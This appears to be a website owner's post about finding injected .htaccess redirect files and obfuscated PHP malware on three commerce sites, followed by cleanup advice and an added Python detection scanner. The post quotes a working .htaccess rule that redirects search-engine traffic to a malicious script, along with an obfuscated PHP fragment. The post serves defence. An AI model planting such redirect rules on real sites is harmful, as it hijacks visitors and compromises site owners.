Suspicious redirect .php and .htaccess files BEWARE MALWARE

    Fortunately not in modeeworld, but for three other commerce websites that I have, I found suspicious .php and .htaccess files that were apparently redirecting people from my websites to who knows where.

    The .php files were named:


    "Inclusion-b*i*t*c*h" was the first one I noticed, which was clearly a file that did not belong in my directory - the name gave it right away. There are dwsync.xml files that are legitimate, but the two dwsync php files noted above in my directories were not legitimate.

    Their basic M.O. is to upload various malicious php files to different places on your site, and then create a malicious new htaccess file with a redirect that references the malicious phps. Interestingly, and bafflingly, their malicious files appear to have been uploaded on the same day, maybe same exact second, as the uploads I did with Dreamweaver to update the sites in the first place.

    The solution in this instance was to of course delete all of the malicious php files, but also in this case the .htaccess files too - because this was not a situation where the .htaccess has been altered, but rather created entirely. For the most part, forum directories need .htaccess files (which are sometimes used to modify the URLs to SEO-friendly versions) but regular website directories do not, unless something special is going on, such as setting the PHP version for that directory.

    The type of code I found in the .htaccess files was, for example:

    RewriteEngine On

    RewriteCond %{ENV:REDIRECT_STATUS} 200
    RewriteRule ^ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^(.*)$ inclusion-b*i*t*c*h.php?$1 [L]

    and the type of code I found inside the .php files was like this:

    [long block of encoded text removed]

    or this:

    $fireplace = 'aH(e)vtS';$expended= 'R';$contesting= '_';$lombard= '_';$lapel = 'i_$Pf';$bandgap= 'i';$ballgown= 'eP"eLgVT'; $exaltation= 'o]Iia"rr'; $joanie= 'i';$jigga= '_]"s[';$humorer = 'gOO^cpT,'; $eadmund='yfgve'; $contemplative ='n';$gillan ='"'; $lusts='Te_';$endomorphism = 'R)_CY"';$anion= '?odQaP='; $appealer='b'; $letti ='ItPQ'; $beard= '"';
    $billowed = 'r';$centennial ='i'; $flap = 'J'; $buttress= 'G';$dowager= 'o'; $linemen ='gan)ac';$lacrosse= 'WUAvENo';$lorin='r';$dejectedly='_N(Oel)Se';

    $graphing = ')';$depressible = '('; $etcpasswd = 'n'; $lamond= 'Kr)'; $florrie ='c';$inexorably ='O';

    $auscultations ='o'; $leeann= 'a';$insistent= ':';$electrocuting = ']';

    $hazy = ' s6Eorre';$dialects='f'; $elapsed= 'p$)uieo[';$entreaty='O4M)e'; $besetting = 'd';$expertly='A';$inconsiderate='Ua$plr;e)'; $atrophy= 'r';
    $handhold = '`';$bit =']'; $granule= 'e';$bramble= 's'; $happily ='['; $ennoble ='E';$banishing='i_Z((nHa$'; $jug='i';$commercialness ='K';$commemorated= ']tNhG,'; $bufferrer= 'ea";$iX'; $critic= 'T';$cleanup = 'rE[_V'; $indoctrinates = 'e';$karita ='s';$fairy ='sd[md:t';

    $euphemism= '$';$fatuous= 'u';$comments= 'p';

    etc. etc.

    Basically, it is a good idea to scan carefully the files in your website directories every now and then. Look for oddly named files, or files that do not belong with the others - for example php files that are placed inside image folders. Take a look at the code inside these suspect files, and if it appears like meaningless jumbled numbers and letters or long strings of unrelated words, chances are these files are malicious. And then look for newly created .htaccess files or look inside legitimate .htaccess files for redirect or other code that references these malicious php files. Once you find one malicious file, note its upload date - you'll usually find that all other malware was uploaded at the exact same date and time.

    You may also reference back to the virgin files that make up your websites - that should be on your computer somewhere, and compare the lists of files on your local computer with those that are hosted up in your website directory. You may also want to download these suspect files, first noting exactly where they came from, to a safe folder on your computer, before deleting them off the server. That way, if you inadvertently delete a needed file that upsets the workings of your website or forum, you may re-upload it.

    But for the most part, once you start finding these malicious files, you will not have such a problem finding them all, and determining that they are in fact malicious.
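Added example (not part of the original post): a Python scan that applies the checks the post describes to a downloaded copy of a site, flagging .htaccess rewrites conditioned on search-engine user agents or referrers, PHP files that look obfuscated, files missing from the local copy, and grouping hits by modification time. The function names, the thresholds (200 and 20) and the sample file names are assumptions made for this example.

```python
import os, re, tempfile
from collections import defaultdict
from pathlib import Path

# COND: search-engine-keyed RewriteCond (as in the post); RULE: rewrite handing requests to a PHP script.
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}.*(?:google|yahoo|msn|aol|bing)", re.I | re.M)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+\.php)\b", re.I | re.M)
BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")          # long encoded-looking run
TINY = re.compile(r"\$\w+\s*=\s*'[^']{0,12}'\s*;")  # $word = 'few chars';

def check_htaccess(text):
    """Flag search-engine-conditional rewrites and name their PHP targets."""
    hits = ["search-engine rewrite to " + t for t in RULE.findall(text)]
    return (hits or ["search-engine condition"]) if COND.search(text) else []

def check_php(text):
    """Flag obfuscation patterns; both thresholds are assumptions."""
    reasons = ["long encoded blob"] if BLOB.search(text) else []
    if len(TINY.findall(text)) >= 20:
        reasons.append("many tiny string assignments")
    return reasons

def scan(root, known_good=()):
    """Return ({relpath: reasons}, {mtime: [relpaths]}) for flagged files."""
    findings, by_mtime = {}, defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name != ".htaccess" and not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            text = Path(path).read_text(errors="replace")
            reasons = check_htaccess(text) if name == ".htaccess" else check_php(text)
            if known_good and rel not in known_good:  # file list from the local copy
                reasons.append("not in local copy")
            if reasons:
                findings[rel] = reasons
                by_mtime[int(os.path.getmtime(path))].append(rel)
    return findings, dict(by_mtime)

def demo():
    """Scan a constructed tree: a redirect .htaccess plus a PHP file in images/."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "images"))
    samples = {".htaccess": "RewriteCond %{HTTP_REFERER} (google|bing)\nRewriteRule ^(.*)$ sample.php?$1 [L]\n",
               "images/sample.php": "<?php " + "$a = 'x'; " * 25,
               "index.php": "<?php echo 'hello';"}
    for rel, body in samples.items():
        Path(root, rel).write_text(body)
    return scan(root, known_good={"index.php"})
```

A hit is a prompt to open the file and read it, not a verdict; files that share a modification time with a confirmed bad file are the next ones to review.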